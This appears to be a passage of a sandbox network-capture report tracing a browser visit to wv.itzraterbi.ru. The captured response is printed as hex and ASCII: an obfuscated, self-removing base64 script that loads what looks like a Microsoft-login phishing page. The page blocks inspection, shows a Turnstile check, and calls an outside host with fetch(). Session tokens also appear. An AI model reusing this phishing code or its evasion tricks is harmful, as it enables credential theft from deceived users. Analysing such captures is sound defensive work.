                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:09:02 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:09:02 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:09:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.1649782172.67.163.1184437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:03 UTC702OUTGET /xxABW/ HTTP/1.1
                                                                                                                          Host: wv.itzraterbi.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:04 UTC1242INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          vary: accept-encoding
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v9NXhtbUtAYoeYZXFBo4yYZBduSiEXZQ8NB0WrnM%2F%2F3JFrqxdeAw8EX9U4R21AJFOKxYw8aFqo1DNIqHkYHI825QQIU71oCEYvq1GctWM9C2xYdDL8%2F%2F8KJoChaC5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=901&min_rtt=852&rtt_var=274&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1610&delivery_rate=4605922&cwnd=253&unsent_bytes=0&cid=80b67b3100753e0f&ts=248&x=0"
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImtvdXFKMjV0M3JubDhvay9VTFZyL1E9PSIsInZhbHVlIjoidGNlTjZqUTFPS1BiNUdYWnNFbmFjQXdFNDhJUk9mMm50c1RrMFNWN2NuVXM3SmhxQmVGNlVhRHdWWExkc1BXOSs5eEhLbEdOUGQ3UHB0S2hlYWtJRGZ1aUtDRmhnbTFDM044cDQrMXhxYXh2SUhQcXNwVGxwWHJFQXhTVGlKajgiLCJtYWMiOiI4MTFiNWZiYTc5OGVmNzllMDYzODI1YjA2MzM0ODljMjE1OGZkNGZiNTY5ZDFkNjIwMWJjZDQyNGZlNWEyOTRlIiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 18:09:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-12-19 16:09:04 UTC731INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 73 79 4f 46 70 4b 55 57 59 30 51 7a 42 32 4d 45 35 73 56 30 5a 59 62 32 4e 72 4f 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 45 46 48 57 55 68 68 51 6d 68 5a 64 44 46 4e 4e 48 52 61 53 48 56 4f 4e 57 55 32 4d 31 5a 54 53 46 4a 74 61 58 46 4b 62 57 52 33 4d 48 52 72 65 48 4a 33 5a 6d 52 57 65 48 68 36 63 55 4a 68 52 69 74 4f 54 6a 63 76 4f 44 41 78 57 47 5a 58 54 6b 39 31 52 6d 4a 75 4e 33 46 68 61 6d 46 55 51 7a 4e 42 4d 45 70 4e 63 54 68 4d 4e 56 42 32 54 45 35 74 62 6c 52 4f 55 58 46 47 4e 54 45 78 54 43 39 5a 54 45 74 45 61 6a 4e 45 63 32 56 44 4d 57 4a 30 56 55 4e 35 56 30 6b 35 4e 7a 42 31 5a 31 52 76 65 56 68 35 59 56 4d
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IisyOFpKUWY0QzB2ME5sV0ZYb2NrOEE9PSIsInZhbHVlIjoiSEFHWUhhQmhZdDFNNHRaSHVONWU2M1ZTSFJtaXFKbWR3MHRreHJ3ZmRWeHh6cUJhRitOTjcvODAxWGZXTk91RmJuN3FhamFUQzNBMEpNcThMNVB2TE5tblROUXFGNTExTC9ZTEtEajNEc2VDMWJ0VUN5V0k5NzB1Z1RveVh5YVM
                                                                                                                          2024-12-19 16:09:04 UTC765INData Raw: 34 65 33 38 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 48 65 58 49 33 4c 6d 6c 30 65 6e 4a 68 64 47 56 79 59 6d 6b 75 63 6e 55 76 65 48 68 42 51 6c 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c
                                                                                                                          Data Ascii: 4e38<script>/* The road to success and the road to failure are almost exactly the same. */if(atob("aHR0cHM6Ly9HeXI3Lml0enJhdGVyYmkucnUveHhBQlcv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJl
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a
                                                                                                                          Data Ascii: VudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJ
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 37 66 51 30 4b 49 31 5a 47 54 46 4a 49 5a 56 70 50 61 58 59 75 62 58 51 74 4e 58 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 4e 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 57 52 6b 78 53 53 47 56 61 54 32 6c 32 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 56 6b 5a 4d 55 6b 68 6c 57 6b 39 70 64 69 41 6a 53 46 70 75 51 6b 56 58 61 6c 5a 43 65 69 42 37 59 32 39 73 62 33 49 36 49 43 4d 32 59 7a 63 31 4e 32 51 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 30 63 48 67 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4c 6a 56 79 5a 57 30 37 66 51 30 4b 49 43 41 67 49 44 77 76 63 33 52 35 62 47 55 2b 44 51 6f 67 49 43
                                                                                                                          Data Ascii: 7fQ0KI1ZGTFJIZVpPaXYubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNWRkxSSGVaT2l2IC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojVkZMUkhlWk9pdiAjSFpuQkVXalZCeiB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogIC
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 32 4e 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 31 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4f 44 55 70 44 51 6f 67 49 43 41 67 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 70 39 4b 54 73 4e 43 6d 52 76 59 33 56 74 5a 57 35 30 4c 6d 46 6b 5a 45 56 32 5a 57 35 30 54 47 6c 7a 64 47 56 75 5a 58 49 6f 4a 32 4e 76 62 6e 52 6c 65 48 52 74 5a 57 35 31 4a 79 77 67 5a 6e 56 75 59 33 52
                                                                                                                          Data Ascii: ZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3R
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 50 67 30 4b 50 47 5a 76 63 6d 30 67 61 57 51 39 49 6b 5a 69 51 6b 6c 69 64 57 46 59 62 6e 4d 69 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 5a 66 64 48 56 79 62 6e 4e 30 61 57 78 6c 49 69 42 70 5a 44 30 69 59 32 59 69 50 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 4e 70 5a 43 49 67 62 6d 46 74 5a 54 30 69 63 32 6c 6b 49 69 42 32 59 57 78 31 5a 54 30 69 4e 32 31 6a 52 30 35 45 5a 46 6c 46 53 57 5a 70 55 55 70 71 53 33 51 35 57 46 4d 7a 4e 31 6c 54 64 6a 52 4b 64 57 56 4f 63 6c 56 31 5a 47 46 73 62 31 46 50 61 53 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75
                                                                                                                          Data Ascii: GV4dC1jZW50ZXIiPg0KPGZvcm0gaWQ9IkZiQklidWFYbnMiPg0KPGRpdiBjbGFzcz0iY2ZfdHVybnN0aWxlIiBpZD0iY2YiPjwvZGl2Pg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9InNpZCIgbmFtZT0ic2lkIiB2YWx1ZT0iN21jR05EZFlFSWZpUUpqS3Q5WFMzN1lTdjRKdWVOclV1ZGFsb1FPaSI+DQo8aW5wdXQgdHlwZT0iaGlkZGVu
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 42 39 4f 77 30 4b 49 43 41 67 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64 45 56 73 5a 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 70 4c 6e 5a 68 62 48 56 6c 49 44 30 67 4a 7a 68 56 5a 6e 59 33 4d 79 63 37 44 51 6f 67 49 43 41 67 64 6d 46 79 49 47 31 73 56 58 70 4c 51 56 4e 34 56 56 59 67 50 53 41 69 4c 69 34 76 64 33 6f 30 64 56 6c 76 63 57 74 4e 57 48 42 31 55 33 68 4a 59 57 6c 32 53 58 68 68 65 44 6c 57 5a 6d 39 50 65 56 5a 6f 53 56 68 51 63 54 52 43 5a 6b 74 4c 62 32 4d 69 4f 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 7a 6c 54 65 6b 46 69 57 6b 35 58 65 58 4e 31 4d 45 35 78 5a 44 64 71 55 30 46 4d 64 57 4e 6e 55 6b 6b 77 57 6c 56 50 63 6e 68 47 64 48 5a 4c 51 6d 4e 70 59
                                                                                                                          Data Ascii: B9Ow0KICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJwYWdlbGluayIpLnZhbHVlID0gJzhVZnY3Myc7DQogICAgdmFyIG1sVXpLQVN4VVYgPSAiLi4vd3o0dVlvcWtNWHB1U3hJYWl2SXhheDlWZm9PeVZoSVhQcTRCZktLb2MiOw0KICAgIGZldGNoKCdodHRwczovLzlTekFiWk5XeXN1ME5xZDdqU0FMdWNnUkkwWlVPcnhGdHZLQmNpY
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 76 64 33 64 33 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a 53 35 6a 62 32 30 6e 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 54 73 4e 43 6e 30 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 44 51 6f 38 4c 32 4a 76 5a 48 6b 2b 44 51 6f 4e 43 6a 77 76 61 48 52 74 62 44 34 3d 27 29 29 29 29 3b 0d 0a 76 61 72 20 65 47 53 77 59 42 42 47 71 50 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 65 47 53 77 59 42 42 47 71 50 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 47 53 77 59 42 42 47 71 50 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 77 61 6c 6b 69 6e 67 20 66 72 6f 6d 20 66 61 69 6c 75 72 65 20 74 6f 20 66 61 69 6c 75 72 65 20 77 69 74 68 20 6e 6f 20 6c 6f 73 73 20 6f
                                                                                                                          Data Ascii: vd3d3Lm1pY3Jvc29mdG9ubGluZS5jb20nKTsNCiAgICB9KTsNCn0NCjwvc2NyaXB0Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4='))));var eGSwYBBGqP = document.currentScript;eGSwYBBGqP.parentNode.removeChild(eGSwYBBGqP);/* Success is walking from failure to failure with no loss o
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 65 48 42 73 61 57 4e 70 64 43 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 52 75 61 6e 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 76 59 57 70 68 65 43 39 73 61 57 4a 7a 4c 32 4e 79 65 58 42 30 62 79 31 71 63 79 38 30 4c 6a 45 75 4d 53 39 6a 63 6e 6c 77 64 47 38 74 61 6e 4d 75 62 57 6c 75 4c 6d 70 7a 49 6a 34 38 4c 33 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 6f 64 48 52 77 4c 57 56 78 64 57 6c 32 50 53 4a 59 4c 56 56 42 4c 55 4e 76 62 58 42 68 64 47 6c 69 62 47 55 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6b 6c 46 50 55 56 6b 5a 32 55 73 59 32 68 79 62 32 31 6c 50 54 45 69 50 67 30 4b 49 43 41
                                                                                                                          Data Ascii: eHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICA
                                                                                                                          2024-12-19 16:09:04 UTC1369INData Raw: 58 59 67 4c 6d 52 70 63 33 42 73 59 58 6b 74 4e 43 42 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4c 6a 49 31 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 56 6b 5a 4d 55 6b 68 6c 57 6b 39 70 64 69 41 75 62 58 51 74 4d 69 42 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 43 34 31 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 56 6b 5a 4d 55 6b 68 6c 57 6b 39 70 64 69 41 75 61 44 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 59 32 46 73 59 79 67 75 4f 54 41 77 63 6d 56 74 49 43 73 67 4c 6a 4e 32 64 79 6b 37 66 51 30 4b 49 31 5a 47 54 46 4a 49 5a 56 70 50 61 58 59 67 4c 6d 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 43 31 6a 5a 57 35 30 5a 58 4a 37 61 6e 56 7a 64 47 6c 6d
                                                                                                                          Data Ascii: XYgLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQojVkZMUkhlWk9pdiAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQojVkZMUkhlWk9pdiAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI1ZGTFJIZVpPaXYgLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlm


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.1649784151.101.130.1374437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:05 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                          Host: code.jquery.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:06 UTC611INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 89501
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:06 GMT
                                                                                                                          Age: 3146078
                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890050-NYC
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          X-Cache-Hits: 55, 8
                                                                                                                          X-Timer: S1734624546.013078,VS0,VE0
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-12-19 16:09:06 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                          2024-12-19 16:09:06 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
